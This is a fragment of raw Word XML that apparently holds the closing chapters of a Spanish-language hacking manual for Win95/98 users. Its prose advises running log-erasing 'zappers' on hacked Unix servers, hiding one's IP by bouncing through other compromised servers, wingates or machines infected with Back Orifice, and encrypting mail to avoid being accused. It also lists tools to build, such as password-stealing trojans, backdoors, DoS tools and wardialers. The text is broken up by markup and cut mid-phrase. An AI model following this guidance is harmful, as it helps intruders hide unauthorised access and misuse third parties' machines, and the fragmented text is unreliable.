        <w:t>-2-1. Borrando Nuestras Huellas?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Cuando conectamos a un servidor, este graba lo que hacemos (cuando hemos  conectado, como, desde donde y varias cosas mas), por eso hay que tener  mucho cuidado.  La mayoria de servidores que hackeemos por Internet seran unix, conviene  tener a mano "zappers", son programas que borran nuestras huellas en el  servidor. Existen muchos programas para este proposito que funcionan bajo  Unix. Solo los tenemos que compilar en el servidor y ejecutarlos. Por  desgracia al usar Win95/98 no podemos compilarlos en nuestro ordenador y  subirlo por FTP pero algo es algo.  Tambien tenemos que procurar esconder nuestra IP, hay muchos metodos  para ello, la mas facil es usar nodos (servidores intermedios y asi  dificultar nuestro rastreo). Un esquema simple seria el siguiente:</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Hacker ------- Servidor ------ Servidor ------- Victima.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               |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Nosotros    Primer servidor   Segundo servidor  Servidor victima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para despistar    para despistar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Hoy en dia, podemos usar muy diferentes opciones para escondernos como por  ejemplo, servidor que hayamos hackeado, sistemas con wingates o similares e  incluso ordenadores que tenga el BO (Back Oriffice) instalado.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t xml:space="preserve">    6-2-2. Encriptando Nuestro Co</w:t>
      </w:r>
      <w:r w:rsidR="007C0FCE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>rreo?</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Conviene encriptar nuestro correo, sobre todo si esta relacionado con el  hacking, ya que asi nadie podra saber que pone y acusarnos de nada. Siempre  podemos alegar "Privacidad en los Datos" :). Al igual que antes hay varios  paquetes de PGP para mail.</w:t>
      </w:r>
      <w:r w:rsidR="007C0FCE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Incluso es recomendable el uso de cuentas anomimas de correo, aunque de  esto la gente esta mas concenciada.   Volvemos a hacer uso de nuestro querido programa PGP version 5 o 6, a gusto  del consumidor.</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t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00205350" w:rsidRPr="007C0FCE" w:rsidRDefault="00205350" w:rsidP="00205350">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0FCE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">  7. Su</w:t>
      </w:r>
      <w:r w:rsidR="007C0FCE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>gerencias Para Un Mejor Hacking?</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Aqui hablare sobre algunas ideas que pueden potenciar el hacking en  Win95/98 y la creacion de nuevas herramientas.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troyanos que capturen el password del acceso a Internet.</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para IP-Spoof.</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Creacion de herramientas de redes para Win95/98.</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Wardialers.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para atacar otros Win95/98 (DoS).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Nuevas Suites.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lastRenderedPageBreak/>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crackeadores del passwd.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criptograficos.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eliminadores de ficheros de forma segura.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Puertas traseras.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de administracion remota.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DoS para saltarse protecciones.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Programas que realmente proporcionen seguridad a nuestro sistema.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7C0FCE" w:rsidRDefault="007C0FCE" w:rsidP="00205350">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">  8. Obtener Informacion?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Todo el mundo esta harto de ver cientos de web's donde no hay nada o  todo esta repetido. Pues ahora os pondre unas pautas que seguir para  obtener la mayor fuente posible de informacion.</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Web's sobre hack (que decir).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Web's sobre seguridad Informatica (aqui siempre podemos encontrar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muchas cosas, que nos podran servir).</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Los RFC (Informacion tecnica sobre Internet, protocolos, seguridad,</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etc...).</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Libros de colores (Documentacion tecnica sobre seguridad en muchos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aspectos).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News (estar en un grupo de news y asi recibir noticias de lo que pasa).</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Mailing lists (aqui estaremos permanentemente informados).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xml:space="preserve">    - IRC (podremos hablar con otros hackers y cambiar opiniones).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00205350" w:rsidRPr="00205350" w:rsidRDefault="00205350" w:rsidP="00205350">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00205350" w:rsidRPr="00205350" w:rsidSect="002755A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205350"/>
    <w:rsid w:val="00205350"/>
    <w:rsid w:val="002755A7"/>
    <w:rsid w:val="002918F2"/>
    <w:rsid w:val="003B1804"/>
    <w:rsid w:val="00490456"/>
    <w:rsid w:val="007C0FCE"/>
    <w:rsid w:val="00CC608F"/>
    <w:rsid w:val="00CE750E"/>
    <w:rsid w:val="00D4612A"/>
    <w:rsid w:val="00E0323C"/>
    <w:rsid w:val="00F21EA7"/>
    <w:rsid w:val="00FF7CC8"/>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5A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165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48</Pages>
  <Words>14512</Words>
  <Characters>79816</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>665</Lines>
  <Paragraphs>188</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Windows uE</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>94140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CiberCalls7</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>WinuE</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2007-10-17T21:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2008-02-10T16:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>